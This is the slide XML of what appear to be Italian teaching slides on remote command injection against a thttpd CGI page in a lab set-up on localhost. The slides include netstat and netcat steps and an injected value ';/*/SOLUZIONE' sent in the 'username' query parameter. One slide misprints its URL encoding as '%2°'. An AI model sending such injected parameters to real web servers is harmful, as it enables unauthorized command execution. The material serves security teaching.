            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="188007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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Effettivamente c’è un processo in ascolto sulla porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>1616</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>, tuttavia non vi è una prova del fatto che il processo sia proprio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>thttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Per verificarlo abbiamo bisogno dei privilegi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Stampiamo il PID ed il nome del processo in ascolto tramite l’opzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1616</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBFF674D-45E6-1FEF-47AB-2AD7379F423F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342136" y="3307150"/>
            <a:ext cx="6449325" cy="466790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4B3664-A6B0-A0A0-3B97-6E0F36EE107D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="3988144"/>
            <a:ext cx="7313596" cy="68776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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Ovviamente l’utente attaccante non ha i privilegi di root, è necessario interagire direttamente con il server Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291927097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
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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xEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="349989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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Contattiamo il server Web sapendo, ma… quale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> dobbiamo usare?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Dal precedente output di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> si evince che il processo ascolta su tutte le interfacce di rete (« :::1616 »), quindi usiamo il seguente comando:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Prima di fare ciò, dobbiamo modificare la stringa che inietteremo in maniera tale da essere accettata in un URL.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Questo processo è chiamato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>URL encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>La stringa da iniettare si trasforma in questo modo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>«;/*/SOLUZIONE» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> «%3B%2F%2°%2FSOLUZIONE»</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215926146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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28"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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="149989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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Proviamo, quindi, ad eseguire il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Dopodiché lanciamo la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> al server col nuovo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>parametro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=«%3B%2F%2A%2FSOLUZIONE»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C33797A-11DC-4BBF-BE79-A5E82D50B6D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="52226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300133" y="2967528"/>
            <a:ext cx="6533332" cy="1195814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321480913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5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="1252219"/>
            <a:ext cx="7313596" cy="149989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285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Il server non sembra restituire alcun output, per cui dobbiamo trovare un modo per visualizzarlo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Modifichiamo il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>SOLUZIONE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>cambiando la seguente stringa:</a:t>
            </a:r>
